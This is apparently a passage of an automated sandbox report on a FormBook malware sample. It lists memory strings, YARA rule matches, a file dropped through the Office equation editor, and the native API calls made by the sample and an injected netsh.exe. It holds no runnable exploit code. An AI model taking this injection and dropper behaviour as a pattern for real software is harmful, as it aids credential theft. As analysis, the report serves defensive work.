Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2193639072.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: explorer.exe, 00000007.00000000.2194586401.00000000041AD000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: explorer.exe, 00000007.00000000.2194586401.00000000041AD000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: explorer.exe, 00000007.00000000.2203143383.000000000842E000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 6.2.princedan85671.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.princedan85671.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 6.2.princedan85671.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.princedan85671.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.princedan85671.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.princedan85671.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\princedan85671.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00419D60 NtCreateFile,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00419E10 NtReadFile,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00419E90 NtClose,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00419F40 NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00419D5A NtCreateFile,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00419DB2 NtCreateFile,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00419E8A NtClose,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009F00C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009F0048 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009F0078 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009EF9F0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009EF900 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009EFAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009EFBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009EFB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009EFC90 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009EFC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009EFD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009EFDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009EFEA0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009EFFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009F10D0 NtOpenProcessToken,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009F0060 NtQuerySection,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009F01D4 NtSetValueKey,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009F010C NtOpenDirectoryObject,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009F1148 NtOpenThread,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009F07AC NtCreateMutant,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009EF8CC NtWaitForSingleObject,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009EF938 NtWriteFile,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009F1930 NtSetContextThread,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009EFAB8 NtQueryValueKey,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009EFA20 NtQueryInformationFile,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009EFA50 NtEnumerateValueKey,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009EFBE8 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009EFB50 NtCreateKey,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009EFC30 NtOpenProcess,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009EFC48 NtSetInformationFile,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009F0C40 NtGetContextThread,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009F1D80 NtSuspendThread,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009EFD5C NtEnumerateKey,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009EFE24 NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009EFFFC NtCreateProcessEx,
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009EFF34 NtQueueApcThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C900C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C907AC NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8F9F0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8F900 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8FAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8FBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8FB50 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8FB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8FC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8FDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8FD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8FFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C910D0 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C90048 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C90060 NtQuerySection,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C90078 NtResumeThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C901D4 NtSetValueKey,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C91148 NtOpenThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C9010C NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8F8CC NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8F938 NtWriteFile,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C91930 NtSetContextThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8FAD0 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8FAB8 NtQueryValueKey,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8FA50 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8FA20 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8FBE8 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8FC90 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8FC48 NtSetInformationFile,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C90C40 NtGetContextThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8FC30 NtOpenProcess,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C91D80 NtSuspendThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8FD5C NtEnumerateKey,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8FEA0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8FE24 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8FFFC NtCreateProcessEx,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8FF34 NtQueueApcThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00099D60 NtCreateFile,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00099E10 NtReadFile,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00099E90 NtClose,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00099D5A NtCreateFile,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00099DB2 NtCreateFile,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00099E8A NtClose,

Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Code function: 4_2_001DA290
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Code function: 4_2_001D1F18
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Code function: 4_2_001D1F28
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Code function: 4_2_006958C0
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Code function: 4_2_0069845F
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Code function: 4_2_006984E5
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Code function: 4_2_0069852B
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_0041E004
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00401027
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00401030
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_0041D0C1
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_0041D3B9
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00402D87
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00409E40
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009FE0C6
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A2D005
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A03040
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A1905A
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009FE2E9
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00AA1238
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00AA63BF
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009FF3CF
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A263DB
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A02305
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A4A37B
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A07353
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A35485
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A11489
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A8443E
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A3D47D
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A1C5F0
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A0351F
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A46540
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A04680
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A0E6C1
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00AA2622
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A4A634
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A0C7BC
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A8579A
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A357C3
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A9F8EE
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A2286D
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A0C85C
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A029B2
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00AA098E
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A169FE
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A8394B
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A85955
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00AB3A83
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00AACBA4
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009FFBD7
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A8DBDA
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A27B00
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A9FDDD
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A30D3B
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A0CD5B
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A32E2F
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A1EE4C
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A9CFB1
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A72FDC
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A10F3F
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A2DF7C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C9E0C6
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CA3040
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CB905A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00D1D06D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CCD005
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C9E2E9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00D41238
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C9F3CF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CC63DB
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00D463BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CA7353
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CEA37B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CA2305
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CB1489
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CD5485
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CDD47D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00D2443E
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CBC5F0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CE6540
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CA351F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CAE6C1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CA4680
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00D42622
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CEA634
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CD57C3
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00D2579A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CAC7BC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00D3F8EE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CAC85C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CC286D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CB69FE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00D4098E
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CA29B2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00D25955
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00D2394B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00D53A83
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00D2DBDA
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C9FBD7
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00D4CBA4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CC7B00
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00D3FDDD
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CACD5B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CD0D3B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CBEE4C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CD2E2F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00D12FDC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00D3CFB1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CCDF7C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CB0F3F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_0009E004
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00082D87
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00082D90
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00089E40
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00082FB0

